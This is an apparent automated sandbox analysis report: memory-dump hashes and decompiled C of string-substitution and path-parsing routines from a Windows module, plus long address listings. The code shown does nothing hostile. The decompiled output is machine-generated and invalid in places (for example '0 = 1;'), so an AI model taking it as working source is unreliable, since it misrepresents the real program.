                                • effff13300300c3010000020000112001000000fe0e00003800000000fe0c00004508000000820100000c010000b000000090000000050000001a000000730100004e010000387@010000032825020006395b000000200700000038c1ffffff02280f0200067c3f0000047b3@0000040374250000026fbc0000067c3f0000047b3@0, xrefs: 4A56D301
                                Memory Dump Source
                                • Source File: 00000009.00000002.2393572633.000000004A550000.00000040.00000001.sdmp, Offset: 4A550000, based on PE: true
                                • Associated: 00000009.00000002.2393624568.000000004A590000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: Delete$CloseOpenValue
                                • String ID: %s=%s$effff13300300c3010000020000112001000000fe0e00003800000000fe0c00004508000000820100000c010000b000000090000000050000001a000000730100004e010000387@010000032825020006395b000000200700000038c1ffffff02280f0200067c3f0000047b3@0000040374250000026fbc0000067c3f0000047b3@0
                                • API String ID: 2185037004-1169048527
                                • Opcode ID: a43af9edd84ab0d756241dbf8401d552c75668d0dd5bed8f5895a788505c17ab
                                • Instruction ID: b27050c7c41ca82d300431d25e71371f823ec39bd288adecfa51a39887779068
                                • Opcode Fuzzy Hash: a43af9edd84ab0d756241dbf8401d552c75668d0dd5bed8f5895a788505c17ab
                                • Instruction Fuzzy Hash: D331FF76201315BBDB626F60DE88E9F3F29FF4A761F008902F91D9E055E7B18A40CB90
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 4A555291, Relevance: 9.4, APIs: 6, Instructions: 390COMMON
                                Download Yara Rule
                                C-Code - Quality: 84%
                                			E4A555291(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				long _t117;
				intOrPtr* _t119;
				signed int _t122;
				void* _t123;
				short* _t129;
				wchar_t* _t130;
				wchar_t* _t132;
				long _t141;
				intOrPtr* _t142;
				signed int _t146;
				intOrPtr* _t147;
				intOrPtr* _t151;
				void* _t153;
				wchar_t* _t157;
				wchar_t* _t169;
				wchar_t* _t171;
				wchar_t* _t175;
				wchar_t* _t177;
				void _t181;
				wchar_t* _t196;
				signed int _t198;
				void* _t199;
				signed int _t202;
				intOrPtr _t207;
				void* _t208;
				void _t212;
				signed int _t213;
				signed int _t215;
				void* _t217;
				void* _t221;
				signed int _t225;
				signed int _t227;
				signed int _t229;
				void _t234;
				intOrPtr _t235;
				void _t236;
				void* _t237;
				void* _t238;
				intOrPtr _t239;
				void _t240;
				void* _t241;
				intOrPtr _t242;
				void _t244;
				void _t245;
				void* _t247;
				void* _t248;
				void* _t253;
				signed int _t254;
				void* _t255;
				void* _t256;
				signed int _t257;
				intOrPtr _t258;
				void* _t259;
				void* _t260;
				signed int _t261;
				void* _t262;
				void* _t263;
				long _t264;
				void* _t266;
				void* _t267;

				_push(0x38);
				_push(0x4a5552f0);
				E4A55264A(__ebx, __edi, __esi);
				_t247 = 0;
				 *(_t266 - 0x30) = 0;
				 *(_t266 - 0x28) = 0;
				 *(_t266 - 0x34) = 0;
				 *((intOrPtr*)(_t266 - 4)) = 0;
				_t117 = E4A551896(0x4000);
				 *(_t266 - 0x30) = _t117;
				if(_t117 == 0) {
					L66:
					if( *(_t266 + 8) != _t247) {
						L72:
						__imp__longjmp( *(_t266 + 8), 0xffffffff);
						L73:
						_t199 = _t247;
						_t99 = _t199 + 2; // 0x2
						_t253 = _t99;
						do {
							_t234 =  *_t199;
							_t199 = _t199 + 2;
						} while (_t234 != 0);
						_t202 = _t199 - _t253 >> 1;
						L43:
						if(_t202 < 0) {
							_t117 = 0;
							L47:
							_t254 = _t117;
							 *(_t266 - 0x38) = _t254;
							if( *( *(_t266 - 0x1c)) != 0x2c) {
								_t203 = _t247 + _t254 * 2;
								_t119 = _t247 + _t254 * 2;
								_t103 = _t119 + 2; // 0x4
								_t255 = _t103;
								while(1) {
									_t235 =  *_t119;
									_t119 = _t119 + 2;
									if(_t235 == 0) {
										break;
									}
								}
								L56:
								_t122 = _t119 - _t255 >> 1;
								L57:
								 *(_t266 - 0x20) = _t122;
								_t123 = _t247;
								_t72 = _t123 + 2; // 0x2
								_t256 = _t72;
								do {
									_t236 =  *_t123;
									_t123 = _t123 + 2;
								} while (_t236 != 0);
								_t257 =  *(_t266 - 0x20);
								E4A554B3D(_t247, (_t123 - _t256 >> 1) + 1, _t203, _t257);
								_t129 = _t247 + _t257 * 2;
								if( *_t129 != 0) {
									 *_t129 = 0;
								}
								_t130 =  *(_t266 - 0x1c);
								_t132 =  &(_t130[0]);
								 *(_t266 - 0x1c) = _t132;
								if( *_t130 !=  *((intOrPtr*)(_t266 + 0x14))) {
									 *( *(_t266 + 0x10)) =  *( *(_t266 + 0x10)) & 0x00000000;
									L14:
									 *((intOrPtr*)(_t266 - 4)) = 0xfffffffe;
									E4A5553A1();
									return E4A5513B6( *(_t266 - 0x34));
								}
								 *( *(_t266 + 0x10)) = _t132 -  *(_t266 + 0xc) >> 1;
								L22:
								 *(_t266 - 0x34) =  *(_t266 - 0x24);
								goto L14;
							}
							 *(_t266 - 0x1c) =  &(( *(_t266 - 0x1c))[0]);
							_t141 = wcstol( *(_t266 - 0x1c), _t266 - 0x1c, 0);
							 *(_t266 - 0x20) = _t141;
							if(_t141 < 0) {
								_t142 = _t247 + _t254 * 2;
								_t85 = _t142 + 2; // 0x2
								_t237 = _t85;
								do {
									_t207 =  *_t142;
									_t142 = _t142 + 2;
								} while (_t207 != 0);
								 *(_t266 - 0x20) =  *(_t266 - 0x20) + (_t142 - _t237 >> 1);
							}
							if( *(_t266 - 0x20) < 0) {
								_t146 = 0;
							} else {
								_t146 =  *(_t266 - 0x20);
							}
							 *(_t266 - 0x20) = _t146;
							_t203 = _t247 + _t254 * 2;
							_t147 = _t203;
							_t238 = _t147 + 2;
							do {
								_t258 =  *_t147;
								_t147 = _t147 + 2;
							} while (_t258 != 0);
							if( *(_t266 - 0x20) < _t147 - _t238 >> 1) {
								_t122 =  *(_t266 - 0x20);
								goto L57;
							}
							_t151 = _t203;
							_t255 = _t151 + 2;
							do {
								_t239 =  *_t151;
								_t151 = _t151 + 2;
							} while (_t239 != 0);
							goto L56;
						}
						_t208 = _t247;
						_t55 = _t208 + 2; // 0x2
						_t259 = _t55;
						do {
							_t240 =  *_t208;
							_t208 = _t208 + 2;
						} while (_t240 != 0);
						if(_t117 >= _t208 - _t259 >> 1) {
							_t153 = _t247;
							_t100 = _t153 + 2; // 0x2
							_t241 = _t100;
							do {
								_t212 =  *_t153;
								_t153 = _t153 + 2;
							} while (_t212 != 0);
							_t117 = _t153 - _t241 >> 1;
						}
						goto L47;
					}
					L64:
					 *( *(_t266 + 0x10)) = _t247;
					goto L14;
				}
				_t196 =  *(_t266 + 0xc);
				_t157 = _t196;
				_t242 =  *((intOrPtr*)(_t266 + 0x14));
				while(1) {
					 *(_t266 - 0x1c) = _t157;
					_t213 =  *_t157 & 0x0000ffff;
					if(_t213 == _t247 || _t213 == _t242 ||  *0x4a574081 != 0 && _t213 == 0x3a && _t157[0] != _t242) {
						break;
					}
					_t157 =  &(_t157[0]);
				}
				if( *_t157 == _t247 || _t157 == _t196) {
					goto L64;
				} else {
					_t260 = (_t157 - _t196 >> 1) + 1;
					_t117 = E4A551896(_t260 + _t260);
					 *(_t266 - 0x28) = _t117;
					if(_t117 == _t247) {
						goto L66;
					}
					_t12 = _t260 - 1; // 0x664a5553
					E4A554B3D( *(_t266 - 0x28), _t260, _t196, _t12);
					_t261 =  *( *(_t266 - 0x1c)) & 0x0000ffff;
					 *(_t266 - 0x1c) =  &(( *(_t266 - 0x1c))[0]);
					_t247 = E4A552070( *(_t266 - 0x28));
					 *(_t266 - 0x24) = _t247;
					if( *0x4a574081 == 0 || _t261 != 0x3a || _t247 == 0) {
						 *( *(_t266 + 0x10)) =  *(_t266 - 0x1c) - _t196 >> 1;
						 *(_t266 - 0x34) = _t247;
						goto L14;
					} else {
						_t169 =  *(_t266 - 0x1c);
						_t215 =  *_t169 & 0x0000ffff;
						if(_t215 == 0x7e) {
							_t171 =  &(_t169[0]);
							 *(_t266 - 0x1c) = _t171;
							_t117 = wcstol(_t171, _t266 - 0x1c, 0);
							_t267 = _t267 + 0xc;
							 *(_t266 - 0x38) = _t117;
							if(_t117 >= 0) {
								L39:
								_t217 = _t247;
								_t54 = _t217 + 2; // 0x2
								_t262 = _t54;
								do {
									_t244 =  *_t217;
									_t217 = _t217 + 2;
								} while (_t244 != 0);
								if(_t117 >= _t217 - _t262 >> 1) {
									goto L73;
								}
								_t202 = _t117;
								goto L43;
							}
							_t221 = _t247;
							_t52 = _t221 + 2; // 0x2
							_t263 = _t52;
							do {
								_t245 =  *_t221;
								_t221 = _t221 + 2;
							} while (_t245 != 0);
							_t117 = _t117 + (_t221 - _t263 >> 1);
							 *(_t266 - 0x38) = _t117;
							goto L39;
						}
						if(_t215 == 0x2a) {
							_t169 =  &(_t169[0]);
							 *(_t266 - 0x1c) = _t169;
							 *((intOrPtr*)(_t266 - 0x40)) = 1;
						} else {
							 *((intOrPtr*)(_t266 - 0x40)) = 0;
						}
						 *(_t266 - 0x3c) = _t169;
						while(1) {
							_t225 =  *_t169 & 0x0000ffff;
							if(_t225 == 0 || _t225 == 0x3d) {
								break;
							}
							_t169 =  &(_t169[0]);
							 *(_t266 - 0x1c) = _t169;
						}
						if( *_t169 == 0) {
							L86:
							 *( *(_t266 + 0x10)) = 0;
							goto L14;
						}
						_t227 = _t169 -  *(_t266 - 0x3c);
						_t228 = _t227 >> 1;
						 *(_t266 - 0x2c) = _t227 >> 1;
						if(_t227 == 0) {
							if( *(_t266 + 8) == 0) {
								goto L86;
							}
							_t117 = E4A556D44(_t228, 0x234a, 1, _t169);
							_t267 = _t267 + 0xc;
							goto L72;
						}
						_t175 =  &(_t169[0]);
						 *(_t266 - 0x1c) = _t175;
						 *(_t266 + 8) = _t175;
						while(1) {
							_t229 =  *_t175 & 0x0000ffff;
							if(_t229 == 0 || _t229 ==  *((intOrPtr*)(_t266 + 0x14))) {
								break;
							}
							_t175 =  &(_t175[0]);
							 *(_t266 - 0x1c) = _t175;
						}
						if( *_t175 == 0) {
							goto L86;
						}
						_t177 =  &(_t175[0]);
						 *(_t266 - 0x1c) = _t177;
						_t198 = _t175 -  *(_t266 + 8) >> 1;
						 *( *(_t266 + 0x10)) = _t177 -  *(_t266 + 0xc) >> 1;
						if( *_t247 == 0) {
							goto L22;
						}
						_t248 =  *(_t266 - 0x24);
						_t264 =  *(_t266 - 0x30);
						_t181 = E4A55185A(_t264, 0x2000, _t248);
						 *(_t266 - 0x48) = _t264;
						 *(_t266 - 0x44) = _t248;
						while(1) {
							L20:
							__imp___wcsnicmp(_t264,  *(_t266 - 0x3c),  *(_t266 - 0x2c));
							_t267 = _t267 + 0xc;
							if(_t181 != 0) {
								break;
							}
							if( *((intOrPtr*)(_t266 - 0x40)) != _t181) {
								memcpy( *(_t266 - 0x24),  *(_t266 + 8), _t198 + _t198);
								E4A55185A( *(_t266 - 0x24) + _t198 + _t198, 0x2000 - _t198, _t264 +  *(_t266 - 0x2c) * 2);
								goto L22;
							}
							memcpy(_t248,  *(_t266 + 8), _t198 + _t198);
							_t267 = _t267 + 0xc;
							_t248 = _t248 + _t198 + _t198;
							 *(_t266 - 0x44) = _t248;
							_t181 =  *(_t266 - 0x2c);
							_t264 = _t264 + _t181 * 2;
							 *(_t266 - 0x48) = _t264;
						}
						_t181 =  *_t264;
						 *_t248 = _t181;
						_t248 = _t248 + 2;
						 *(_t266 - 0x44) = _t248;
						_t264 = _t264 + 2;
						 *(_t266 - 0x48) = _t264;
						if( *((short*)(_t248 - 2)) != 0) {
							goto L20;
						}
						goto L22;
					}
				}
			}































































                                0x4a555291
                                0x4a555293
                                0x4a555298
                                0x4a55529d
                                0x4a55529f
                                0x4a5552a2
                                0x4a5552a5
                                0x4a5552a8
                                0x4a5552b0
                                0x4a5552b5
                                0x4a5552ba
                                0x4a55fdab
                                0x4a55fdae
                                0x4a566ae8
                                0x4a566aed
                                0x4a566af3
                                0x4a566af3
                                0x4a566af5
                                0x4a566af5
                                0x4a566af8
                                0x4a566af8
                                0x4a566afc
                                0x4a566afd
                                0x4a566b04
                                0x4a55f4c0
                                0x4a55f4c2
                                0x4a55f6e8
                                0x4a55f4e3
                                0x4a55f4e3
                                0x4a55f4e5
                                0x4a55f4ef
                                0x4a566b2a
                                0x4a566b2d
                                0x4a566b2f
                                0x4a566b2f
                                0x4a566b32
                                0x4a566b32
                                0x4a566b36
                                0x4a566b3a
                                0x00000000
                                0x00000000
                                0x4a566b40
                                0x4a55f54c
                                0x4a55f54e
                                0x4a55f550
                                0x4a55f550
                                0x4a55f553
                                0x4a55f555
                                0x4a55f555
                                0x4a55f558
                                0x4a55f558
                                0x4a55f55c
                                0x4a55f55d
                                0x4a55f566
                                0x4a55f56e
                                0x4a55f573
                                0x4a55f57a
                                0x4a566b44
                                0x4a566b44
                                0x4a55f580
                                0x4a55f587
                                0x4a55f588
                                0x4a55f58f
                                0x4a566b4f
                                0x4a555385
                                0x4a555385
                                0x4a55538c
                                0x4a555399
                                0x4a555399
                                0x4a55f59d
                                0x4a55f342
                                0x4a55f345
                                0x00000000
                                0x4a55f345
                                0x4a55f4f5
                                0x4a55f502
                                0x4a55f507
                                0x4a55f50c
                                0x4a55fda3
                                0x4a55fda6
                                0x4a55fda6
                                0x4a55fdb6
                                0x4a55fdb6
                                0x4a55fdba
                                0x4a55fdbb
                                0x4a55fdc4
                                0x4a55fdc4
                                0x4a55f516
                                0x4a566b23
                                0x4a55f51c
                                0x4a55f51c
                                0x4a55f51c
                                0x4a55f51f
                                0x4a55f522
                                0x4a55f525
                                0x4a55f527
                                0x4a55f52a
                                0x4a55f52a
                                0x4a55f52e
                                0x4a55f52f
                                0x4a55f53b
                                0x4a55f5a4
                                0x00000000
                                0x4a55f5a4
                                0x4a55f53d
                                0x4a55f53f
                                0x4a55f542
                                0x4a55f542
                                0x4a55f546
                                0x4a55f547
                                0x00000000
                                0x4a55f542
                                0x4a55f4c8
                                0x4a55f4ca
                                0x4a55f4ca
                                0x4a55f4cd
                                0x4a55f4cd
                                0x4a55f4d1
                                0x4a55f4d2
                                0x4a55f4dd
                                0x4a566b0b
                                0x4a566b0d
                                0x4a566b0d
                                0x4a566b10
                                0x4a566b10
                                0x4a566b14
                                0x4a566b15
                                0x4a566b1c
                                0x4a566b1c
                                0x00000000
                                0x4a55f4dd
                                0x4a55fd99
                                0x4a55fd9c
                                0x00000000
                                0x4a55fd9c
                                0x4a5552c0
                                0x4a5552c3
                                0x4a5552c5
                                0x4a5552c9
                                0x4a5552c9
                                0x4a5552cc
                                0x4a5552d2
                                0x00000000
                                0x00000000
                                0x4a5552e9
                                0x4a5552e9
                                0x4a555315
                                0x00000000
                                0x4a555323
                                0x4a555328
                                0x4a55532e
                                0x4a555333
                                0x4a555338
                                0x00000000
                                0x00000000
                                0x4a55533e
                                0x4a555347
                                0x4a55534f
                                0x4a555352
                                0x4a55535e
                                0x4a555360
                                0x4a55536a
                                0x4a555380
                                0x4a555382
                                0x00000000
                                0x4a55f2f1
                                0x4a55f2f1
                                0x4a55f2f4
                                0x4a55f2fb
                                0x4a55f46f
                                0x4a55f470
                                0x4a55f47f
                                0x4a55f481
                                0x4a55f484
                                0x4a55f489
                                0x4a55f4a3
                                0x4a55f4a3
                                0x4a55f4a5
                                0x4a55f4a5
                                0x4a55f4a8
                                0x4a55f4a8
                                0x4a55f4ac
                                0x4a55f4ad
                                0x4a55f4b8
                                0x00000000
                                0x00000000
                                0x4a55f4be
                                0x00000000
                                0x4a55f4be
                                0x4a55f48b
                                0x4a55f48d
                                0x4a55f48d
                                0x4a55f490
                                0x4a55f490
                                0x4a55f494
                                0x4a55f495
                                0x4a55f49e
                                0x4a55f4a0
                                0x00000000
                                0x4a55f4a0
                                0x4a55f305
                                0x4a566b58
                                0x4a566b59
                                0x4a566b5c
                                0x4a55f30b
                                0x4a55f30b
                                0x4a55f30b
                                0x4a55f30e
                                0x4a55f34d
                                0x4a55f34d
                                0x4a55f353
                                0x00000000
                                0x00000000
                                0x4a55f35c
                                0x4a55f35d
                                0x4a55f35d
                                0x4a55f365
                                0x4a566b68
                                0x4a566b6b
                                0x00000000
                                0x4a566b6b
                                0x4a55f36d
                                0x4a55f370
                                0x4a55f372
                                0x4a55f375
                                0x4a566b75
                                0x00000000
                                0x00000000
                                0x4a566b7f
                                0x4a566b84
                                0x00000000
                                0x4a566b84
                                0x4a55f37c
                                0x4a55f37d
                                0x4a55f380
                                0x4a55f383
                                0x4a55f383
                                0x4a55f389
                                0x00000000
                                0x00000000
                                0x4a55f392
                                0x4a55f393
                                0x4a55f393
                                0x4a55f39b
                                0x00000000
                                0x00000000
                                0x4a55f3a4
                                0x4a55f3a5
                                0x4a55f3ad
                                0x4a55f3b7
                                0x4a55f3bc
                                0x00000000
                                0x00000000
                                0x4a55f3be
                                0x4a55f3c8
                                0x4a55f3cc
                                0x4a55f3d1
                                0x4a55f3d4
                                0x4a55f313
                                0x4a55f313
                                0x4a55f31a
                                0x4a55f320
                                0x4a55f325
                                0x00000000
                                0x00000000
                                0x4a55fe4d
                                0x4a566b96
                                0x4a566bb3
                                0x00000000
                                0x4a566bb3
                                0x4a55fe5b
                                0x4a55fe60
                                0x4a55fe66
                                0x4a55fe68
                                0x4a55fe6b
                                0x4a55fe6e
                                0x4a55fe71
                                0x4a55fe71
                                0x4a55f32b
                                0x4a55f32e
                                0x4a55f332
                                0x4a55f333
                                0x4a55f337
                                0x4a55f338
                                0x4a55f340
                                0x00000000
                                0x00000000
                                0x00000000
                                0x4a55f340
                                0x4a55536a

                                Memory Dump Source
                                • Source File: 00000009.00000002.2393572633.000000004A550000.00000040.00000001.sdmp, Offset: 4A550000, based on PE: true
                                • Associated: 00000009.00000002.2393624568.000000004A590000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: Heap$AllocProcess
                                • String ID:
                                • API String ID: 1617791916-0
                                • Opcode ID: cc5ddd9f83d6e7c7b054918bb8f1962f92d933fa8997bef0e7f2359438a7856f
                                • Instruction ID: 0c4f8cf0b7d2af3e34842f3b1626de6ac4c269c6c80bef1ac301f6f9b252d102
                                • Opcode Fuzzy Hash: cc5ddd9f83d6e7c7b054918bb8f1962f92d933fa8997bef0e7f2359438a7856f
                                • Instruction Fuzzy Hash: 62D1D371D00206EFCB19DF68CA406FD7BB4FF59304B02412AE856EB29CE7709A46CB50
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 4A55944C, Relevance: 9.2, APIs: 6, Instructions: 238COMMON
                                Download Yara Rule
                                C-Code - Quality: 86%
                                			E4A55944C(void* __ebx, signed int _a4) {
				signed int _v8;
				intOrPtr _v12;
				int _v16;
				signed int __edi;
				WCHAR** __esi;
				signed int _t34;
				signed int _t35;
				signed int _t39;
				signed int _t40;
				void* _t41;
				signed int _t43;
				signed int _t45;
				signed int _t47;
				signed int* _t50;
				void* _t54;

				_t41 = __ebx;
				 *0x4a574128 =  *0x4a574128 & 0x00000000;
				_t50 = _a4;
				_t43 =  *_t50;
				_v12 = 0x4a574874;
				_t45 = _t43 + 2;
				do {
					__di =  *__eax;
					__eax = __eax + 1;
					__eax = __eax + 1;
					__eflags = __di;
				} while (__di != 0);
				__eax = __eax - __edx;
				_push(__ebx);
				_v8 = __eax;
				__edi = E4A552ED1(__ecx);
				__eflags =  *__edi - 0x3a;
				if( *__edi == 0x3a) {
					__eflags = _v8 - 2;
					if(_v8 <= 2) {
						goto L4;
					}
					__ebx = SetErrorMode;
					__eax = 0;
					 *__edi = __ax;
					__edi = __edi - 1;
					__edi = __edi - 1;
					_v16 = SetErrorMode(0);
					__eax = E4A5539EF( *__esi, 0x8000);
					_a4 = __eax;
					__eflags = __eax - 0xffffffff;
					if(__eax == 0xffffffff) {
						L44:
						__edi = __edi + 1;
						__edi = __edi + 1;
						__eax = 0x3a;
						 *__edi = __ax;
						__eflags =  *0x4a574098 - 4;
						if( *0x4a574098 != 4) {
							__eax = E4A556D44(__ecx, 0x236b, 1,  *__esi);
						} else {
							__eflags =  *0x4a5740ec;
							if( *0x4a5740ec == 0) {
								__eax = E4A556D44(__ecx, 0x236b, 1,  *__esi);
							}
							 *0x4a5740f0 = 1;
						}
						__eflags = _a4 - 0xffffffff;
						L50:
						if(__eflags == 0) {
							L52:
							__eax = SetErrorMode(_v16);
							goto L4;
						}
						L51:
						__eax = E4A553AB3(_a4);
						goto L52;
					}
					__eax = E4A553B03(__eax, __ecx, __eax);
					__eflags = __eax;
					if(__eax != 0) {
						L42:
						__eax = E4A553B03(__eax, __ecx, _a4);
						__eflags = __eax;
						if(__eax != 0) {
							goto L51;
						}
						__eflags = __eax;
						goto L50;
					}
					__eax = E4A556BEA(__eax, _a4);
					__eflags = __eax;
					if(__eax == 0) {
						goto L44;
					}
					goto L42;
				}
				L4:
				__esi[6] = E4A552041(0x250);
				__ecx =  *__edi & 0x0000ffff;
				__ax =  *0x4a590664; // 0x5c
				_a4 =  *__edi & 0x0000ffff;
				__eflags = __cx - __ax;
				if(__cx == __ax) {
					L29:
					__ax =  *0x4a590664; // 0x5c
					__eflags = _a4 - __ax;
					if(_a4 == __ax) {
						_v12 = 0x4a574876;
					}
					__eax = E4A560BC9( *__esi);
					__eflags = __al;
					if(__al == 0) {
						__edi = _v8;
						__ebx =  *__esi;
						__edi = _v8 + 5;
						__eflags = __edi;
						__eax = __edi + __edi;
						 *__esi = E4A552041(__edi + __edi);
						__eax = E4A5520A9(__esi,  *__esi, __edi, _v12);
					}
					__eax = __esi[6];
					 *(__esi[6]) = 0x10;
					L14:
					__edx =  *__esi;
					0 = 1;
					__edi = 0;
					__eflags = 0;
					__ecx =  *__esi;
					while(1) {
						_t34 =  *_t43 & 0x0000ffff;
						if(_t34 == 0) {
							break;
						}
						_t54 = _t34 -  *0x4a590664; // 0x5c
						if(_t54 == 0) {
							L1:
							_t47 = _t43;
							L18:
							_t43 = _t43 + 2;
							_t41 = _t41 + 1;
							continue;
						}
						if(_t34 == 0x3a) {
							__eflags = _t41 - 2;
							if(_t41 != 2) {
								goto L18;
							}
							goto L1;
						}
						goto L18;
					}
					_t50[3] = _t47;
					__eflags = _t47;
					if(_t47 == 0) {
						_t50[4] = _t45;
						_t47 = _t45;
					} else {
						__eflags =  *_t47 - _t34;
						_t10 = _t47 + 2; // 0x2
						_t40 = _t10;
						if( *_t47 == _t34) {
							_t40 = _t47;
						}
						_t50[4] = _t40;
					}
					_t35 = E4A5518EB(_t47, 0x2a);
					__eflags = _t35;
					if(_t35 != 0) {
						L28:
						_t50[7] = _t50[7] | 0x00000008;
						 *0x4a5740f4 = 1;
						goto L24;
					} else {
						_t39 = E4A5518EB(_t47, 0x3f);
						__eflags = _t39;
						if(_t39 != 0) {
							goto L28;
						}
						L24:
						_t50[5] = E4A5518EB(_t47, 0x2e);
						__eflags = 1;
						return 1;
					}
				}
				__eax = __ax & 0x0000ffff;
				__edi = E4A552148( *__esi, __ax & 0x0000ffff);
				__eflags = __edi;
				if(__edi == 0) {
					__edi =  *__esi;
					__eax = __edi;
					_t31 = __eax + 2; // 0x2
					__edx = _t31;
					do {
						__cx =  *__eax;
						__eax = __eax + 1;
						__eax = __eax + 1;
						__eflags = __cx;
					} while (__cx != 0);
					__eax = __eax - __edx;
					__eax = __eax >> 1;
					__eflags = __eax - 2;
					if(__eax >= 2) {
						__eflags =  *((short*)(__edi + 2)) - 0x3a;
						if( *((short*)(__edi + 2)) == 0x3a) {
							__edi = __edi + 4;
						}
					}
					goto L7;
				} else {
					__edi = __edi + 1;
					__edi = __edi + 1;
					__eflags = __edi;
					L7:
					__ebx = __imp___wcsicmp;
					__eax =  *__ebx(E4A552EC4);
					__ecx = __edi;
					_pop(__ecx);
					__eflags = __eax;
					if(__eax == 0) {
						goto L29;
					}
					__eax =  *__ebx(E4A552EBC);
					__ecx = __edi;
					_pop(__ecx);
					__eflags = __eax;
					if(__eax == 0) {
						goto L29;
					}
					__eflags =  *0x4a574098 - 4;
					if( *0x4a574098 == 4) {
						__eflags =  *0x4a5740e8 - 1;
						if( *0x4a5740e8 == 1) {
							goto L10;
						}
						__eflags =  *0x4a57409c - 1;
						if( *0x4a57409c != 1) {
							goto L14;
						}
						 *0x4a57409c =  *0x4a57409c & 0x00000000;
					}
					L10:
					__ebx = GetFileAttributesW( *__esi);
					__eflags = __ebx - 0xffffffff;
					if(__ebx == 0xffffffff) {
						 *0x4a574128 = GetLastError();
					} else {
						 *0x4a574128 =  *0x4a574128 & 0x00000000;
						__eflags =  *0x4a574128;
					}
					__eflags = __ebx - 0xffffffff;
					if(__ebx != 0xffffffff) {
						__eflags = __bl & 0x00000010;
						if((__bl & 0x00000010) != 0) {
							goto L29;
						}
					}
					goto L14;
				}
			}


















                                0x4a55944c
                                0x4a559454
                                0x4a55945c
                                0x4a55945f
                                0x4a559464
                                0x4a55946b
                                0x4a55946e
                                0x4a55946e
                                0x4a559471
                                0x4a559472
                                0x4a559473
                                0x4a559473
                                0x4a559478
                                0x4a55947a
                                0x4a55947e
                                0x4a559486
                                0x4a559488
                                0x4a55948c
                                0x4a56961d
                                0x4a569621
                                0x00000000
                                0x00000000
                                0x4a569627
                                0x4a56962d
                                0x4a56962f
                                0x4a569632
                                0x4a569634
                                0x4a56963e
                                0x4a569641
                                0x4a569646
                                0x4a569649
                                0x4a56964c
                                0x4a56967c
                                0x4a56967c
                                0x4a56967f
                                0x4a569680
                                0x4a569681
                                0x4a569684
                                0x4a56968b
                                0x4a5696bc
                                0x4a56968d
                                0x4a56968d
                                0x4a569694
                                0x4a56969f
                                0x4a5696a4
                                0x4a5696a7
                                0x4a5696a7
                                0x4a5696c4
                                0x4a5696c8
                                0x4a5696c8
                                0x4a5696d2
                                0x4a5696d5
                                0x00000000
                                0x4a5696d5
                                0x4a5696ca
                                0x4a5696cd
                                0x00000000
                                0x4a5696cd
                                0x4a56964f
                                0x4a569654
                                0x4a569656
                                0x4a569664
                                0x4a569667
                                0x4a56966c
                                0x4a56966e
                                0x00000000
                                0x00000000
                                0x4a569678
                                0x00000000
                                0x4a569678
                                0x4a56965b
                                0x4a569660
                                0x4a569662
                                0x00000000
                                0x00000000
                                0x00000000
                                0x4a569662
                                0x4a559492
                                0x4a55949c
                                0x4a55949f
                                0x4a5594a2
                                0x4a5594a8
                                0x4a5594ab
                                0x4a5594ae
                                0x4a560b68
                                0x4a560b68
                                0x4a560b6e
                                0x4a560b72
                                0x4a560b74
                                0x4a560b74
                                0x4a560b7d
                                0x4a560b82
                                0x4a560b84
                                0x4a560b86
                                0x4a560b89
                                0x4a560b8b
                                0x4a560b8b
                                0x4a560b8e
                                0x4a560b9a
                                0x4a560ba7
                                0x4a560ba7
                                0x4a560bac
                                0x4a560baf
                                0x4a55952a
                                0x4a55952a
                                0x4a55952e
                                0x4a55952f
                                0x4a55952f
                                0x4a559531
                                0x4a559533
                                0x4a559533
                                0x4a559539
                                0x00000000
                                0x00000000
                                0x4a55953b
                                0x4a559542
                                0x4a559440
                                0x4a559440
                                0x4a55954e
                                0x4a55954f
                                0x4a559550
                                0x00000000
                                0x4a559550
                                0x4a55954c
                                0x4a5595a2
                                0x4a5595a5
                                0x00000000
                                0x00000000
                                0x00000000
                                0x4a5595a7
                                0x00000000
                                0x4a55954c
                                0x4a559553
                                0x4a559557
                                0x4a559559
                                0x4a560bba
                                0x4a560bbd
                                0x4a55955f
                                0x4a55955f
                                0x4a559562
                                0x4a559562
                                0x4a559565
                                0x4a56970d
                                0x4a56970d
                                0x4a55956b
                                0x4a55956b
                                0x4a559571
                                0x4a559576
                                0x4a559578
                                0x4a559624
                                0x4a559624
                                0x4a559628
                                0x00000000
                                0x4a55957e
                                0x4a559581
                                0x4a559586
                                0x4a559588
                                0x00000000
                                0x00000000
                                0x4a55958e
                                0x4a559596
                                0x4a55959c
                                0x4a55959f
                                0x4a55959f
                                0x4a559578
                                0x4a5594b4
                                0x4a5594bf
                                0x4a5594c1
                                0x4a5594c3
                                0x4a5696dc
                                0x4a5696de
                                0x4a5696e0
                                0x4a5696e0
                                0x4a5696e3
                                0x4a5696e3
                                0x4a5696e6
                                0x4a5696e7
                                0x4a5696e8
                                0x4a5696e8
                                0x4a5696ed
                                0x4a5696ef
                                0x4a5696f1
                                0x4a5696f4
                                0x4a5696fa
                                0x4a5696ff
                                0x4a569705
                                0x4a569705
                                0x4a5696ff
                                0x00000000
                                0x4a5594c9
                                0x4a5594c9
                                0x4a5594ca
                                0x4a5594ca
                                0x4a5594cb
                                0x4a5594cb
                                0x4a5594d7
                                0x4a5594d9
                                0x4a5594da
                                0x4a5594db
                                0x4a5594dd
                                0x00000000
                                0x00000000
                                0x4a5594e9
                                0x4a5594eb
                                0x4a5594ec
                                0x4a5594ed
                                0x4a5594ef
                                0x00000000
                                0x00000000
                                0x4a5594f5
                                0x4a5594fc
                                0x4a5611e4
                                0x4a5611eb
                                0x00000000
                                0x00000000
                                0x4a5611f1
                                0x4a5611f8
                                0x00000000
                                0x00000000
                                0x4a5611fe
                                0x4a5611fe
                                0x4a559502
                                0x4a55950a
                                0x4a55950c
                                0x4a55950f
                                0x4a55961a
                                0x4a559515
                                0x4a559515
                                0x4a559515
                                0x4a559515
                                0x4a55951c
                                0x4a55951f
                                0x4a559521
                                0x4a559524
                                0x00000000
                                0x00000000
                                0x4a559524
                                0x00000000
                                0x4a55951f

                                APIs
                                Memory Dump Source
                                • Source File: 00000009.00000002.2393572633.000000004A550000.00000040.00000001.sdmp, Offset: 4A550000, based on PE: true
                                • Associated: 00000009.00000002.2393624568.000000004A590000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: _wcsicmp$AttributesFile
                                • String ID:
                                • API String ID: 2635507994-0
